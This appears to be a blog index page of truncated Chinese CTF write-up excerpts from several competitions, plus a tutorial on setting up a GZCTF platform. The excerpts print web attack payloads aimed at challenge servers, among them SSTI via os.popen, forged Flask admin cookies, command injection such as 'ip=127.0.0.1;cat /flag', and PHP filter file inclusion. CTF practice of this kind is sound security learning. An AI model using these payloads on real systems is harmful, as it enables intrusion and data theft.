NDCTF-WP
WEBezpython源码找到路由/s3c0nd,进去发现需要fuzz,(直接盲猜114514结果对了),再进去是个ssti,直接打就行 GET:name={{lipsum.__globals__['os'].popen('cat...
LilCTF-WP
WEB689eca0d-0acd-8ac8-69e6-6d696e006c7e curl -v "http://http://challenge.xinshi.fun:35914/api/file/download/72ddc765-caf6-43e3-941e-eeddf924f8df" -o avatar.webp {'_flashes': [('success', '登陆成功,欢迎!')], 'is_admin': True, 'user_id': 2, 'username': 'admin'}flask-unsign --sign --cookie "{'_flashes': [('success', '登陆成功,欢迎!')], 'is_admin': True,...
MoeCTF-WP
0 Web入门指北直接放控制台回车就行 moectf{jv@vScr1p7_14_so0o0o0o_inT3r3&t!!!} 01 第一章 神秘的手镯只有前端验证,网络响应或者是直接控制台输入都行 document.getElementById('passwordInput').value =...
磐石行动-WP
WEBezDecryption源码中找到提示2025,就是第一步验证码答案 抓包修改step2为step3进入第三关 分析源码中js文件,在控制台中分析获得第一段为panshi 第二段base64解码后为2oZ5 发包获得flag flag{d1g1t4l_l0ck_br34k3r_2025} 1web-jaba_ezMISC1derderjiaeasy_miscBinwalk提取图片获得压缩包,里面是ook编码,解密获得y0u_c@t_m3!!!,就是压缩包密码,解压获得flagflag{3088eb0b-6e6b-11ed-9a10-145afc243ea2} 1两个数level1尝试直接二进制转ascii不行,那就尝试按位反转后补齐转ascii # 给定的二进制串列表binary_strings = [ "1100001", "000011", "0111011", "1110011", "0100111",...
NepCTF-WP
JavaSeri签到题,借这个题顺便解决了哈shiro框架工具不能正常使用的历史遗留问题,最后发现java版本1.8.0_321能够正常使用 这个题登录之后看到熟悉的rememberMe,直接工具一把梭,爆破密钥加爆破利用链及回显再执行命令就行了 flag{e22d3fa1-4a94-1155-e387-9b8744455d70} easyGooGooVVVY参考ElasticSearch Groovy 沙盒绕过 && 代码执行漏洞 - twsec -...
0xGame-WP
2024ez_login弱口令直接爆破即可,admin/admin123 0xGame{It_Is_Easy_Right?} ez_rcefrom flask import Flask, requestimport subprocessapp = Flask(__name__)@app.route("/")def index(): return open(__file__).read()@app.route("/calc", methods=['POST'])def calculator(): expression = request.form.get('expression') or "114 1000 * 514 + p" result = subprocess.run(["dc", "-e", expression], capture_output=True, text=True) ...
L3HCTF-WP
best_profile先分析源码,发现在app.py中存在如下代码 @app.route("/get_last_ip/<string:username>", methods=["GET", "POST"])def route_check_ip(username): if not current_user.is_authenticated: return "You need to login first." user = User.query.filter_by(username=username).first() if not user: return "User not found." return render_template("last_ip.html", last_ip=user.last_ip)geoip2_reader =...
MOVECTF-WP
RCELABS-0 flag{3s2wvash-ps8i-42r-8idu-29lukzyaulna} RCELABS-1a=system("tac /flag"); flag{jrifs3wu-dsqq-4hr-8pmw-lojok3hevw9a} RCELABS-2GET:action=submitPOST:content=system("cat /flag") flag{qicmdfa6-qphh-4rz-8dze-uyq1k5icrha5} RCELABS-3a=cat /flag flag{x88vasgf-jsvy-4ga-8mlb-wbot5g7mh20c} RCELABS-4ip=127.0.0.1;cat /flag flag{sy2wwv2g-fk61-47z-8pic-m2uof4pfi7ko} RCELABS-5cmd=cat...
奇奇怪怪的教程
前言前天搭GZ台子的时候看了很多教程,也踩了很多坑,所以就想记录下自己的安装步骤 一.GZCTF搭建及web环境搭建1.docker安装(Windows)1.1docker下载英文版下载地址:Docker: Accelerated Container Application Development 汉化版下载地址:Release 4.42.0 · asxez/DockerDesktop-CN 如果下载汉化版,还要下载配置文件,到c盘中的安装路径(默认路径安装的话就为C:\Program Files\Docker\Docker\frontend\resources),替换原来的配置文件即可,原配置文件应该是appxxxx.asar这个名字 下载后安装的时候似乎没有其他多余选项了,直接下一步就行,但是路径目前不知道怎么修改,只有装在c盘 安装完成后重启电脑就行 1.2docker配置首次进入docker会要求登录账户,可以注册一个Docker hub的账户,也可以跳过 然后就去更换拉取的镜像源,默认是从Docker...
BUUCTF靶场
前言新开个靶场接着刷题,极客大挑战已经做过的就跳了,参考极客大挑战-WP | Yxing [ACTF2020 新生赛]Include根据tips中的文件包含直接伪协议 GET:file=php://filter/read=convert.base64-encode/resource=flag.php flag{99cbe927-0326-4ad0-9cbb-0d524fef23e3} [HCTF 2018]WarmUp源码提示source.php,直接访问,源码发现hint.php,也直接访问 //source.php<?php highlight_file(__FILE__); class emmm { public static function checkFile(&$page) { $whitelist =...